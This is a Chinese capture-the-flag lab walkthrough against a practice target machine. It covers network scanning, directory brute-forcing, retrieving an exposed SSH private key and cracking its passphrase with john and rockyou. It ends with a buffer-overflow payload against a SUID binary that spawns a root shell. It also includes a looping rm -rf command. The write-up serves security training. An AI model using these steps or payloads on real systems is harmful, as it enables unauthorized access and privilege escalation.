1.探测靶机IP
netdiscover -r 192.168.71.1/24
![](https://i-blog.csdnimg.cn/blog_migrate/3ec3fc23c3bf14dfb89e1f8746aacdaa.png)
2.扫描靶机开放的服务
nmap -sV 192.168.71.101
![](https://i-blog.csdnimg.cn/blog_migrate/86bc42bd9299374cea50822a53fd671d.png)
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查;
![](https://i-blog.csdnimg.cn/blog_migrate/751a93cfaf68b02d571fa17d2eeb473f.png)
无信息
3.使用工具探测隐藏页面
dirb http://192.168.71.101:31337/
![](https://i-blog.csdnimg.cn/blog_migrate/79d1db74cdd63241ea57605104366442.png)
查看robots协议。robots协议是禁止爬虫爬取的地方。
![](https://i-blog.csdnimg.cn/blog_migrate/4efba6a52ef0ec207bc7952a451f5a4a.png)
依次查看地址
![](https://i-blog.csdnimg.cn/blog_migrate/89924b1717d80f0efd9ab409e3c7f3c8.png)
找到第一个flag
4.访问.ssh文件
![](https://i-blog.csdnimg.cn/blog_migrate/851d5f8a1309dd96c49256b73d18ba0d.png)
然后考虑这些信息是否是一个文件,可以进行尝试
![](https://i-blog.csdnimg.cn/blog_migrate/bd132be55e31eba3ee4fe4b7f1127589.png)
下载完后放桌面
进入桌面cd /home/web/desktop //web为用户名
5.连接ssh
ssh -i id_isa 用户名@靶场机器IP地址 用户名在认证文件authorized_key
ssh -i id_rsa simon@192.168.71.101
chmod xxx 文件 赋权
chmod 600 id_rsa
找文件 locate
locate ssh2john
使用ssh2john 将id_rsa密钥转换成John可以识别的信息
python2 /usr/share/john/ssh2john.py id_rsa>rsacrack
john被锁定 解除-> watch rm -rf /root/.john/john.rec
利用字典解密rsacrack信息
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
![](https://i-blog.csdnimg.cn/blog_migrate/bb7c516814138bc0f4a8e06c31f5db54.png)
找到密码starwars
连接ssh
6.提权限
输入id 查看权限
进入root目录
ls显示 flag 和文件read_message.c
提升权限首先查找具有root权限的文件
find / -perm -4000 2>/dev/null
文件read_message.c刚好出现在find / -perm -4000 2>/dev/null 中
cat文件read_message.c
char program[] = "/usr/local/sbin/message";
char buf[20];
char authorized[] = "Simon";
if (!strncmp(authorized, buf, 5)) {
printf("Hello %s! Here is your message:\n\n", buf);
// This is safe as the user can't mess with the binary location:
execve(program, NULL, NULL);
strncmp()
如果返回值 < 0,则表示 str1 小于 str2。
如果返回值 > 0,则表示 str1 大于 str2。
如果返回值 = 0,则表示 str1 等于 str2。
buf[20];20个字符
如果输入溢出了,会回复什么。
输入溢出,然后跳转到bin目录下,尝试一下。通过下面一条命令来提升权限
运行文件 直接输入read_message
Simon123451234567891/bin/sh 20个字符